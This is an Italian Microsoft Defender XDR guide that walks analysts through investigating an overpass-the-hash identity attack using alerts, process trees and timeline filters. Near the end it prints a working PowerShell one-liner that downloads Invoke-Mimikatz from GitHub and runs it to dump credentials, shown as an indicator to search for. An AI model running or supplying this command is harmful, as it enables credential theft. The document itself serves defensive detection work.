Condividi tramite

Esempio di attacco basato su identità

  • Articolo

Si applica a:

  • Microsoft Defender XDR

Microsoft Defender per identità può aiutare a rilevare tentativi dannosi di compromettere le identità nell'organizzazione. Poiché Defender per identità si integra con Microsoft Defender XDR, gli analisti della sicurezza possono avere visibilità sulle minacce provenienti da Defender per identità, ad esempio sospetti tentativi di elevazione dei privilegi netlogon.

Analisi dell'attacco in Microsoft Defender per identità

Microsoft Defender XDR consente agli analisti di filtrare gli avvisi in base all'origine di rilevamento nella scheda Avvisi della pagina degli eventi imprevisti. Nell'esempio seguente l'origine di rilevamento viene filtrata in Defender per identità.

Filtrare l'origine di rilevamento in Microsoft Defender per identità

Se si seleziona l'avviso Sospetto attacco overpass-the-hash, viene visualizzata una pagina in Microsoft Defender for Cloud Apps in cui vengono visualizzate informazioni più dettagliate. Per altre informazioni su un avviso o un attacco, selezionare Altre informazioni su questo tipo di avviso per leggere una descrizione dei suggerimenti di attacco e correzione.

Avviso sospetto di attacco overpass-the-hash

Analisi dello stesso attacco in Microsoft Defender per endpoint

In alternativa, un analista può usare Defender per endpoint per altre informazioni sull'attività in un endpoint. Selezionare l'evento imprevisto dalla coda degli eventi imprevisti e quindi selezionare la scheda Avvisi . Da qui è possibile identificare anche l'origine di rilevamento. Un'origine di rilevamento etichettata come EDR è l'acronimo di Rilevamento endpoint e risposta, ovvero Defender per endpoint. Da qui, l'analista seleziona un avviso rilevato da EDR.

Rilevamento e risposta degli endpoint nel portale di Microsoft Defender per endpoint

La pagina dell'avviso visualizza varie informazioni pertinenti, ad esempio il nome del dispositivo interessato, il nome utente, lo stato dell'analisi automatica e i dettagli dell'avviso. La storia dell'avviso illustra una rappresentazione visiva dell'albero dei processi. L'albero dei processi è una rappresentazione gerarchica dei processi padre e figlio correlati all'avviso.

Albero del processo di avviso nel Microsoft Defender per endpoint

Ogni processo può essere espanso per visualizzare altri dettagli. I dettagli visualizzati da un analista sono i comandi effettivi immessi come parte di uno script dannoso, indirizzi IP di connessione in uscita e altre informazioni utili.

Dettagli del processo nel portale di Microsoft Defender per endpoint

Selezionando Visualizza nella sequenza temporale, un analista può eseguire il drill-down ancora di più per determinare l'ora esatta della compromissione.

Microsoft Defender per endpoint è in grado di rilevare molti file e script dannosi. Tuttavia, a causa di molti usi legittimi per le connessioni in uscita, PowerShell e l'attività della riga di comando, alcune attività vengono considerate non dannose fino a quando non crea un file o un'attività dannosa. Pertanto, l'uso della sequenza temporale consente agli analisti di inserire l'avviso nel contesto con l'attività circostante per determinare l'origine o l'ora originali dell'attacco che in caso contrario viene oscurato dall'attività comune del file system e dell'utente.

Per usare la sequenza temporale, un analista inizia al momento del rilevamento degli avvisi (in rosso) e scorre verso il basso indietro nel tempo per determinare quando l'attività originale che ha portato all'attività dannosa è effettivamente iniziata.

Ora di inizio dell'analista per il rilevamento degli avvisi

È importante comprendere e distinguere le attività comuni, ad esempio connessioni Windows Update, traffico di attivazione software attendibile di Windows, altre connessioni comuni a siti Microsoft, attività Internet di terze parti, attività Configuration Manager di Microsoft Endpoint e altre attività non dannose da attività sospette. Un modo per distinguere consiste nell'usare i filtri della sequenza temporale. Esistono molti filtri che possono evidenziare attività specifiche e filtrare tutto ciò che l'analista non vuole visualizzare.

Nell'immagine seguente l'analista ha filtrato per visualizzare solo gli eventi di rete ed elaborare. Questo criterio di filtro consente all'analista di visualizzare le connessioni di rete e i processi che circondano l'evento in cui il Blocco note ha stabilito una connessione con un indirizzo IP, come illustrato anche nell'albero dei processi.

Come è stato usato il Blocco note per creare una connessione in uscita dannosa

In questo particolare evento, Blocco note è stato usato per creare una connessione in uscita dannosa. Tuttavia, spesso gli utenti malintenzionati usano iexplorer.exe per stabilire connessioni per scaricare un payload dannoso perché in genere iexplorer.exe processi vengono considerati normali attività del Web browser.

Un altro elemento da cercare nella sequenza temporale è l'uso di PowerShell per le connessioni in uscita. L'analista cercherà connessioni PowerShell riuscite con comandi, ad IEX (New-Object Net.Webclient) esempio seguiti da una connessione in uscita a un sito Web che ospita un file dannoso.

Nell'esempio seguente, PowerShell è stato usato per scaricare ed eseguire Mimikatz da un sito Web:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Un analista può cercare rapidamente le parole chiave digitando la parola chiave nella barra di ricerca per visualizzare solo gli eventi creati con PowerShell.

Passaggio successivo

Vedere il percorso di analisi del phishing .

Vedere anche

Consiglio

Per saperne di più, Engage con la community Microsoft Security nella community tech: Microsoft Defender XDR Tech Community.